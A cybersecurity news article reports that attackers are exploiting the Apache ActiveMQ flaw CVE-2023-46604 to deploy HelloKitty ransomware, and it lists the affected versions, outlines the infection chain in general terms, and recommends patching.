HelloKitty Ransomware Exploiting Apache ActiveMQ Flaw

The recently disclosed Apache ActiveMQ remote code execution (RCE) flaw, CVE-2023-46604 is being exploited to spread ransomware binaries on target systems and demand a ransom from the victim organizations.

Based on the evidence and the ransom note, Rapid7 experts have linked the activity to the HelloKitty ransomware family, whose source code was made public on a forum in early October.

CVE-2023-46604 is a critical severity RCE with a CVSS v3 score of 10.0, exploiting the serialized class types in the OpenWireprotocol that enables attackers to execute arbitrary shell commands.

Document
FREE Webinar

Webinar on Cyber Resilience for Financial Sector

Ensure your Cyber Resiliance with the recent wave of cyber-attacks targeting the financial services sector. Almost 60% respondents not confident to recover fully from a cyber attack.

“The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath,” ShadowServer reports.

The compromised environments’ indications were present in both of the impacted customer environments, which were using outdated Apache ActiveMQ versions.

Affected Versions

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

On October 25, 2023, Apache announced the issue and updated ActiveMQ. Details on vulnerabilities and proof-of-concept exploit code are both made publicly available.

HelloKitty Ransomware Exploiting Apache ActiveMQ Flaw

In 2020, the ransomware program HelloKitty appeared and has since been used in other high-profile attacks.

In this case, the attacker attempts to use the Windows Installer (msiexec) to load remote binaries with the names M2.png and M4.png after successful exploitation.

The 32-bit.NET executable named dllloader, contained in both MSI files, loads a Base64-encoded payload called EncDLL. EncDLL acts similarly to ransomware, searching and ending a particular set of processes before starting the encryption process and appending the encrypted files with the “.locked” extension.

Fix Released

The issues have been addressed in 5.15.16, 5.16.7, 5.17.6, or 5.18.3 versions.

Mitigation 

As soon as feasible, organizations should upgrade to an addressed version of ActiveMQ and examine their systems for signs of vulnerability.

Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Try a free trial to ensure 100% security.

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.